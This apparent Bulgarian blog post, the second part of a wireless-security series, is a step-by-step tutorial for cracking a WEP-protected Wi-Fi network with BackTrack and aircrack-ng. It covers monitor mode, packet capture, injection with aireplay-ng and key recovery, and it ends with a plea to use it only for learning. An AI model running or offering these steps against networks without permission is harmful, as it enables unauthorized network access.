Част №2 Wireless мрежи - WEP

ЧАСТ 1 (Wireless мрежи-въведение) : ТУК
ЧАСТ 3 (Wireless мрежи-WPA) :  ТУК 

Сега вече можем да преминем към съществената част от нашата задача.Първо стартирайте Back Track и отворете терминален прозорец.След това напишете airmon-ng за да видите интерфейсите на картата в моя случаи това е wlan0 с командата airmon-ng start wlan0 ние преминаваме към монитор мод на дадения интерфейс.

След това използваме командата airodump-ng за да сканираме за мрежи.Както виждате имаме налична мрежа с името SKIDHACKER важно е да се отбележи BSSID , канала , вида криптиране сега ще покажем как става с WEP






Сега използваме командата airodump-ng -c (канал) -w WEPcrack --bssid (bssid на мрежата) wlan0 ето и какво представлява тази команда започваме да сканираме конкретната мрежа -c отбелязваме канала -w посочваме къде да се запише информацията –bssid посочваме коя точно мрежа да сканира ,а wlan0 е инферфейса
 
Отворете нов терминал и напишете следната команда за да започне по-бързото събиране на дата пакети aireplay-ng -1 0 -a (bsisd) wlan0 сега ако всичко е наред трябва да ви изпише Association successful :-)
Следващата команда която трябва да използвате във същия прозорец е
 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) wlan0 когато ви попита дали искате да я използвате напишете Y и ентер.
След като съберете дадено количество дата пакети (препоръчвам над 20 000 ) напишете следната команда aircrack-ng WEPcrack*.cap името може да е различно това е използвано в примера . Ако не стане от първия път изчакайте повече пакети.



Когато се покаже този резултат KEY FOUND! [ XX:XX:XX:XX:XX ] значи всичко е готово X е паролата и ако като пример получите 11:22:33:44:55 то паролата е 1122334455 без : .

Моля използвайте получената информация само за учебна цел .В следващата статия ще разберете как става с WPA 






No comments:

Post a Comment